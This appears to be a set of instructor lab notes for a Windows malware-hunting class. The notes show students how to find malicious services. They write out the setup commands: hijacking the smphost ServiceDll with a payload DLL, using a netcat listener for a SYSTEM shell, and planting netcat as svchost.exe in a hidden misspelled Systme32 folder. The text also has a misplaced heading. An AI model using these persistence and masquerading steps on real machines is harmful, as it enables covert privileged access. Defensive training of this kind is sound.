GitLab now enforces expiry dates on tokens that originally had no set expiration date. Those tokens were given an expiration date of one year later. Please review your personal access tokens, project access tokens, and group access tokens to ensure you are aware of upcoming expirations. Administrators of GitLab can find more information on how to identify and mitigate interruption in our documentation.
=== 5.1 Demo: Manipulating SMPhost Service and Parameters
*REQUIRES PAYLOAD.DLL AND NETCAT*
* Microsoft Storage Spaces SMP (smphost) Service Defaults in Windows 10
* Storage Spaces is a technology in Windows and Windows Server that can help protect your data from drive failures. It is conceptually similar to RAID, implemented in software.
[source,powershell]
----
mkdir "C:\windows \" # keep space and quotes.
dir # show that our fake windows directory reads as if it was the real windows directory
cd "C:\windows \" # change directory to our fake windows folder
regedit.exe # open gui to visually show students the changes being made
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smphost # locate this service in the registry
ObjectName = LocalSystem # Change this value to LocalSystem
Parameters -> ServiceDll c:\windows \system32 \payload.dll # Put the location of the malicious Dll in the data field. ( Keep Spacing )
netcat -lvp 7778 # open another command prompt and run nc.exe -lvp 7778
net start smphost # start service and you should get a system shell in your nc.exe window
sc.exe queryex smphost # query the smphost service and grab the PID of the service running
Get-process | select name,id,path | where {$_.id -eq "PID#"} # show how the malicious service runs as C:\windows\System32\svchost.exe ( hard to find )
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smphost /s # dump the registry contents and show the changes under the parameters key
gci -Recurse -path hklm:\SYSTEM\CurrentControlSet\Services\smphost # Same as previous but in PowerShell fu.
whoami # in the netcat window run a whoami to show you are now SYSTEM
----
.*Q: Why would Malware want to use services to hide itself? How does a service run compared to how a process runs?*
* Services can be used for malicious intent to easily hide malware. When services are set to start at boot, they are able to start any executables attached with them to also start with the service. Unlike a process this is done without interaction from the user.
- `*Services.msc*` - Windows GUI for editing and configuring services.
- `*sc*` - Built in Windows command that can create, modify and delete services.
.*Q: What information are we looking for?*
- `Where the service executable %PATH% is started.` The Name of the service so you can look in the Registry Keys and in Services.msc for anything that stands out.
- Look for `abnormal executables attached to the service, when the service starts and how, and especially if the service has any network traffic.`
- Also, look at the `dependencies and load order group` for when it starts as it will be the order it loads and if another server will load it to try to blend in better.
- A service group is a collection of services that are loaded together at system startup
- multiple drivers are configured to access the same device then the driver that is loaded first will claim 'ownership' of the device. This driver is then allowed to dictate the terms of shared ownership with other drivers or can retain exclusive control for itself.
- The `HKEY_LOCAL_MACHINE\CurrentControlSet\Control\GroupOrderList` subkey determines the order in which services within a Service Group are loaded. Services in a Service Group are assigned a tag, a unique numeric value within a Service Group which determines the service load order.
- Drivers are loaded in the registry’s Load Ordering Group List, followed by drivers not in the list.
- Keep in mind if a malicious driver was loaded first into let’s say the TCP/IP service which controlled the other legit drivers and dependencies we could hide traffic from even showing up on wireshark.
=== 5.2 Demo: Service configuration post-modification behavior
.*COMMAND LINE*
* For this demo netcat was used and renamed to svchost.exe.
* Change directory to C:\windows and create a folder named Systme32.
* Apply hidden attributes to the folder.
* Copy the netcat.exe to the newly created folder and make sure the name is now svchost.exe
* Apply hidden attributes to svchost.exe
[source,cmd]
----
cd c:\windows
mkdir Systme32
attrib +h Systme32
copy (path of netcat.exe) c:\windows\systme32\svchost.exe
attrib +h svchost.exe
----
* `Create the malicious service ( DON'T LET THE STUDENTS SEE YOU DO THIS )`
* Create the description value to make the service look more legit
== 3. Scheduled Tasks
[source,cmd]
----
reg add "hklm\system\currentcontrolset\services\service host" /v Description /t reg_sz /d "Svchost is essential in the implementation of so-called shared service processes, where a number of services can share a process in order to reduce resource consumption."
----
* Don't forget to start the new service
[source,cmd]
----
net start "Service Host"
----
.*Q: So from what we learned earlier what are the first steps to finding the malware?*
[source,cmd]
----
Get-process | select name,id,path
----
* If they don't find the malware pull the netstat list to see if they can find the port.
[source,cmd]
----
netstat -ano
----
* Run netstat -ano and point out the open port 443 it should never be listening
* Open another command prompt and connect to the open port.
* Run whoami command to show you now have system level access
[source,cmd]
----
c:\windows\systme32\svchost.exe 127.0.0.1 443
----
* Search for all non-system32 process first. Will find it faster.
